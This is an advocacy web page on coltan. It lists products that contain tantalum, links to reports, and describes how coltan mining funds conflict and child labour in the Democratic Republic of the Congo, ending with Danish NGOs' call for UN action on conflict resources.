• Jet engines
• Rockets
• Cutting tools
• Camera lenses
• X-ray film
• Ink jet printers
• Hearing aids
• Pacemakers
• Airbag protection systems
• Ignition and motor control modules, GPS, ABS systems in automobiles
• Game consoles such as playstation, xbox and nintendo
• Video cameras
• Digital still cameras
• Sputtering targets
• Chemical process equipment
• Cathodic protection systems for steel structures such as bridges, water tanks
• Prosthetic devices for humans – hips, plates in the skull, also mesh to repair bone removed after damage by cancer
• Suture clips
• Corrosion resistant fasteners, screws, nuts, bolts
• High temperature furnace parts.
• High temperature alloys for air and land based turbines

Links and Resources

Coltan Wiki Facts
Guns, Money and Cell Phones
United Nations Coltan Primer
Congo’s Coltan Rush!


POLE Institute Report “The Coltan Phenomenon!” (PDF)
Columbium and Tantulum: US Geological Survey (PDF)
China and Congo’s Coltan Connection (PDF)

Congo War – 4 Million Dead (PDF)
Coltan Facts (PDF)
FFI Coltan Report (PDF)

 

The components controlling the flow of electricity in mobile phones are composed of the refined mineral known as Coltan. With more and more people using mobile phones the demand for Coltan has increased significantly.

Mobile phones fuel Congo conflict

The largest reserves of Coltan are to be found in the Democratic Republic of the Congo, and much of the finance sustaining the civil wars in Africa, especially in the Democratic Republic of the Congo, is directly connected to Coltan profits. Coltan is extracted under terrible working conditions in mines in Eastern Congo.

The United Nations reports child labour in Africa has significantly increased in Coltan mines. In some regions of the Congo, about 30 percent of schoolchildren are now forced to work in the mines.

It can be dangerous to ask questions

“The control over these resources works through maintaining local militia and exploiting cheap labour to excavate the mines”, says Antony Grange, Country Coordinator with experience from the DanChurchAid work in DRC Congo. “Attempting to oppose these practices locally is very risky business, as DanChurchaid’s former partner “Héritiers de la Justice” knows all too well since they have experienced several assassination of their staff members in the recent years. Only international pressure may stop this development,” says Antony Grange.

International pressure is important

When Denmark become a member of the UN Security Council, the Danish Government put the actions to promote peace and stability in Africa on top of the agenda, and they promised to put a focus on the role natural recourses play as a cause to many conflicts. Income from oil, diamonds and export of woods, continues to fuel armed conflicts.

A call to action

However, Denmark has not managed to convince the Security Council to strengthen the present activities. Therefore the Danish development NGOs now call on the Minister for Foreign Affairs to bring the issue to the table and to work for more efficient tools for the UN to punish those who make profit out of the conflict resources. The organisation also calls for a permanent position within the UN, with a mandate to work for prevention of conflicts financed by natural resources such as oil, woods, and minerals.